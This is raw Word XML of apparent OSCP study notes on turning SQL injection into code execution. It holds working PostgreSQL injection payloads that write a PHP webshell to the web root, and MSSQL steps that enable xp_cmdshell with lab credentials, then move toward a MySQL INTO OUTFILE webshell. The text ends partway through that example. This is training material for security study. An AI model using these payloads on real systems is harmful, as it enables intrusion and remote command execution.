      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No INTO OUTFILE. Use server‑side file I/O that is superuser‑only.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY … TO '/path/file' (superuser)</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ; COPY (SELECT $$&lt;?php echo system($_REQUEST["cmd"]); ?&gt;$$) TO '/var/www/html/cmd.php';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY … TO PROGRAM to echo out (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ; COPY (SELECT $$&lt;?php echo system($_REQUEST["cmd"]); ?&gt;$$) TO PROGRAM 'bash -c "cat &gt; /var/www/html/cmd.php"';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Untrusted PLs (e.g., plpythonu) (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; DO $$ import pathlib; pathlib.Path("/var/www/html/cmd.php").write_text("&lt;?php echo system($_REQUEST[\"cmd\"]); ?&gt;") $$;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CE">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rgimcc81yo0x" w:id="198"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (10.3.1. Manual Code Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Depending on the underlying database system we are targeting, we need to adapt our strategy to obtain code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Microsoft SQL Server, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId486">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId487">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">xp_cmdshell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function takes a string and passes it to a command shell for execution. The function returns any output as rows of text. The function is disabled by default and once enabled, it must be called with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword instead of SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our database, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user already has the appropriate permissions. Let's enable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by simulating an SQL injection via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D6">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="496" name="image520.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image520.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48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7D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE sp_configure 'show advanced options', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE sp_configure 'xp_cmdshell', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After logging in from our Kali VM to the MSSQL instance, we can enable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show advanced options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by setting its value to 1, then applying the changes to the running configuration via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement. Next, we'll enable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and apply the configuration again using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this feature enabled, we can execute any Windows shell command through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement followed by the feature name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DE">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="576" name="image549.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image549.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48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7DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="940"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE xp_cmdshell 'whoami';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we have full control over the system, we can now easily upgrade our SQL shell to a more standard reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let's move to MySQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the various MySQL database variants don't offer a single function to escalate to RCE, we </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> abuse the</w:t>
      </w:r>
      <w:hyperlink r:id="rId490">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId491">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SELECT INTO_OUTFILE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement to write files on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this attack to work, the file location must be writable to the OS user running the database software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As an example, let's resume the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload on our MySQL target application we explored previously, expanding the query that writes a</w:t>
      </w:r>
      <w:hyperlink r:id="rId492">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId493">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">webshell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll issue the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL keywords to include a single PHP line into the first column and save it as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a writable web folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
